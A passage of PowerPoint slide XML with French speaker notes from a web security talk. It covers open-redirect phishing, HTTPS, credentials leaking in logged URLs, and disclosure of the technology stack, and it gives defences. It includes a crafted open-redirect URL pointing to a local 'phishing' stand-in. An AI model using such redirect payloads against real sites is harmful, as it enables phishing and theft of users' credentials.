              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1"/>
              <a:t>Danger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> en étant sur le site de phishing Alice accorde toute sa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1"/>
              <a:t>confiance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> à ce site alors que c’est un site malveillant. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Et donc si elle y saisie des données sensibles telle que ses identifiants de connection, ses coordonnées bancaires Oscar pourra s’en emparer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Pour arriver discrètement à ses fins, Oscar doit fournir a Alice une URL de redirection vers son site pirate.</a:t>
            </a:r>
          </a:p>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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Par exemple il peux se servir d’un mail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Reprenons ici notre site de vente en ligne : Alice a ajouté un nouveau produit et reçoit par email le lien du site lui permettant de modifier directement son produit. En se rendant sur ce lien elle est redirigée vers la page d’authentification avec pour paramètre l’urlcible (page de modification du produit)</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r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Ce qui se passe lorsque l’on appelle cette URL : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>il existe une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> action </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>qui récupère le paramètre de l’URL cible et redirige l’utilisateur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quel est le danger ici pour l’utilisateur, bien évidemment c’est d’être redirigé vers un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>site dangereux.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Très souvent on utilise les redirections pour accéder à une page protégée alors que l’on est plus authentifé</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-298450" rtl="0">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Passage par la page d’authentification tout en conservant l’URL cible </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-298450" rtl="0">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Une fois authentifié =&gt; redirection vers la page sécurisée attendue</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endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://localhost:8080/authentification?urlCible=http://localhost:8081/phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Oscar sait que l’action d’authentification peut attendre en paramètre une URL cible.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> Il envoie à Alice une URL d’authentification avec pour paramètre une URL cible qui la redirige vers un site de phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Ce site de phishing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>est une simple copie du site de base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> sur lequel Alice va s’authentifier et Oscar pourra récupérer par exemple ses identifiant de connexion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Oscar fait acheter le produit à Alice et recupère ses infos banquaires</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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640"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pour se protéger, il faut</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Whitelist : liste de liens accessible depuis le site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Table de correspondance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID ⇔ url, le serveur determine l’URL complète sur le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sit</a:t>
            </a:r>
            <a:endParaRPr lang="fr" dirty="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91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quand parle de sécurité Web, on pense de suite au HTTPS. Il garantit que le site sur lequel vous êtes connecté est vraiment le site qu'il prétend être, et que les données que</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vous transmettez à celui-ci sont illisibles par un tiers durant leur transit. Le fameux man in the middle.</a:t>
            </a:r>
          </a:p>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sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Je pense que tout le monde a déjà vu cette page affichée dans son navigateur au moins une fois.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C’est une alerte affichée grâce à Safe Browsing, un service de sécurisant la navigation sur le web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Safe Browsing vous averti que vous aller sûrement faire quelque chose de dangereux. Que le site que vous visitez est un site de phishing, un site proposant des téléchargements de malwares ou un site exploitant des failles de sécurité.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La technologie est efficace pour détecter les sites qui causent du tord à l’ensemble des internautes. Il est plus difficile en revanche de détecter les attaques plus volatiles qui n’affectent qu’un sous ensemble de la population. Les client connectés par exemple sur une page bien particulière. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Les navigateurs intègrent un système pour prévenir les internautes, il n’est pas infaillible donc si vous ne voulez pas que votre site ressemble à ça ou pire que vos internautes ne fasse dérober des informations sans le savoir, il est utile de de soucier de la sécurité dès à présent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="14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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Toutes les données sensibles et personnelles liées à un client doivent être servies en HTTPS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Attention juste aux paramètres que vous faites transiter dans les urls car celles-ci sont logguées dans les accesslog des serveurs, l’historique du navigateur et le referrer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Je me rappelle sur un projet que nous avions implémenté une authentification. On était bien parti car nous avions utilisés le https pour la connexion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Le formulaire d’authentification était une popin disponible sur tout le site donc également en http. Le support des navigateur IE 7 8 et 9 nous interdisait de faire du CORS lors de l’appel, du coup on est parti sur du JSONP. Le problème avec le JSONP c’est que tous les paramètres de la requête sont passés en GET. On tombait dans le problème cité à l’instant des url loggué sur les proxies et dans l’infra. Ces urls contenaient les login et mot de passe des utilisateurs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>L’audit de sécurité nous a rattrapé et nous avons du abandonner le JSONP pour partir sur une page de connexion dédié full https.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pour ne pas s’exposer inutilement, le but est de donner le moins d’informations sur les logiciels et framework utilisés. Il faut savoir qu'avec un simple nom et un numéro de version, il est très facile pour n'importe qui de trouver sur internet la liste des vulnérabilités connues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>J’en profite pour attirer votre attention sur le choix des librairies et framework que vous intégrez à vos projets. Assurez vous un minimum du suivi de la correction des failles de sécurité.</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15000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1- header http : configurez correctement vos serveurs pour ne pas qu’ils positionnent le nom et la version dans le header HTTP “server” La on apprend que la page a été servi par un nginx version 1.9.2 ou encore par un tomcat.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 - sur la deuxième image à droite vous pouvez admirez une jolie stacktrace exposant tous les composants de l’application. Du serveur Web, à la base de données en passant par le framework MVC tout est affiché. Là on apprend que j’utilise jpa couplé avec hibernate, le tout encapsulé dans spring et tournant avec jetty.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 - la dernière est une page d’erreur 404 non customisée. La traditionnelle page 404 de tomcat.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hormis les headers HTTP, les pages d’erreur 404 et 500 non configurés, les autres vecteurs de divulgations courant sont :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL vers des assets. Si vous utilisez un CMS, le chemin vers les images ou les pdf contiennent généralement le nom du CMS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Commentaires dans les fichiers javascript ou HTML. C’est fou ce qu’un développeur peut être verbeux desfois. Heureusement que la minification aide à se prémunir de se genre d’erreur. J’ai vu ou codé moi même</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>des variables trop explicite. Du style idOracle, ce qui laisse penser que la base de donner est Oracle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou des commentaires du gente // Envoie des données en Ajax à Struts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>En préparant cette conf, j’ai relu les audits de sécurité que nous avions reçu, et je suis tombé sur une slide ou l’entreprise détaillait notre stack technique sur un test boite noire. C’est à dire en n’ayant pas le code source, si aucune indication. Tout ça en analysant le résultat produit par l’application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
